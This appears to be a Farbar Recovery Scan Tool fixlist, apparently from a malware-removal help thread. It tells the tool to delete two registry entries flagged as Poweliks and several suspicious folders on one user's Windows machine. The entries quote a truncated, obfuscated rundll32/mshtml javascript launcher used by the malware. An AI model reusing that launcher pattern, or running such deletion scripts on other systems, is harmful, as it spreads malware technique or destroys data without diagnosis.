Start
CustomCLSID: HKU\S-1-5-21-959614479-2053488890-3420463721-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKU\S-1-5-21-959614479-2053488890-3420463721-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\ProgramData\@system3.att
C:\Users\Teresa2\AppData\Roaming\FrameworkUpdate7
C:\ProgramData\@system.temp
C:\Users\Teresa2\AppData\Roaming\麽鎒駓覜
C:\ProgramData\Windows Genuine Advantage
EmptyTemp:
End